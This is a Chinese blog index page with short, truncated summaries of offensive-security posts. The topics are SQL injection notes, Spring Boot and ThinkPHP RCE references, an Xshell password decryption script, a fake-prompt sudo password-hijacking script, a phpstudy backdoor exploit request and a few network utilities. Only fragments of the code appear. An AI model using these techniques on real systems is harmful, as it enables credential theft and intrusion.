是谁走漏了消息

2022年11月20日

摘要： mssql 参考连接 https://www.cnblogs.com/shellr00t/p/5310187.html https://fuping.site/2017/05/16/MSSQL-DBA-Permission-GET-WEBSHELL/ 1.报错注入：【1】首先爆版本：http:// 阅读全文

posted @ 2022-11-20 21:37 是谁走漏了消息阅读(52) 评论(0) 推荐(0)

mysql-备忘录

摘要： mysql基础注入知识参考资料： https://pureqh.top/?p=1882 bypass安全狗常用函数 ascii() length() substr() # 左闭右闭 hex() isnull() # isnull+load_file可以扫描判断文件名是否存在 cancat(0x7 阅读全文

posted @ 2022-11-20 21:31 是谁走漏了消息阅读(28) 评论(0) 推荐(0)

Sping-漏洞

摘要： Spring Boot Actuator(eureka xstream deserialization RCE) 参考资料： https://www.jianshu.com/p/91a5ca9b7c1c 本文的大部分步骤 https://github.com/LandGrey/SpringBootV 阅读全文

posted @ 2022-11-20 21:27 是谁走漏了消息阅读(125) 评论(0) 推荐(0)

xhell6解密脚本

摘要： xhell6解密脚本 import hashlib import base64 string = "nt authority\system S-1-5-18" # ######## sha256 ######## sha256 = hashlib.sha256() sha256.update(str 阅读全文

posted @ 2022-11-20 21:14 是谁走漏了消息阅读(46) 评论(0) 推荐(0)

简单linux-sudo密码劫持脚本

摘要：简单linux-sudo密码劫持脚本 #!/bin/bash swhoami=`whoami` if [[ ! -f "/tmp/..." ]]; then swhoami=`whoami` read -s -p "[sudo] password for $swhoami: " passwd ech 阅读全文

posted @ 2022-11-20 21:12 是谁走漏了消息阅读(122) 评论(0) 推荐(0)

thinkphp漏洞

摘要： thinkphp漏洞参考资料：https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection 敏感信息 THINKPHP3.2 结构：Application\Runtime\Logs\Home\16_09_09.log THINKPHP3 阅读全文

posted @ 2022-11-20 21:10 是谁走漏了消息阅读(210) 评论(0) 推荐(0)

python版nbtscan

摘要： python版nbtscan # -*- coding:utf-8 -*- import socket import sys from datetime import datetime # import threading import time import ipaddress # 识别ip段模块阅读全文

posted @ 2022-11-20 21:09 是谁走漏了消息阅读(159) 评论(0) 推荐(0)

ping实现

摘要： ping实现实现一 # encoding:utf-8 import time import struct import socket import select import sys def chesksum(data): n=len(data) m=n % 2 sum=0 for i in ra 阅读全文

posted @ 2022-11-20 21:08 是谁走漏了消息阅读(36) 评论(0) 推荐(0)

phpstudy后门

摘要： phpstudy后门 exp GET /index.php HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; 阅读全文

posted @ 2022-11-20 21:05 是谁走漏了消息阅读(63) 评论(0) 推荐(0)

golang接收文件脚本

摘要： golang接收文件脚本 package main import ( "io" "os" "fmt" "io/ioutil" "net/http" ) // https://www.jianshu.com/p/b49cc19d26f0 参考资料 func uploadHandler(w http.R 阅读全文

posted @ 2022-11-20 21:03 是谁走漏了消息阅读(62) 评论(0) 推荐(0)

start星

公告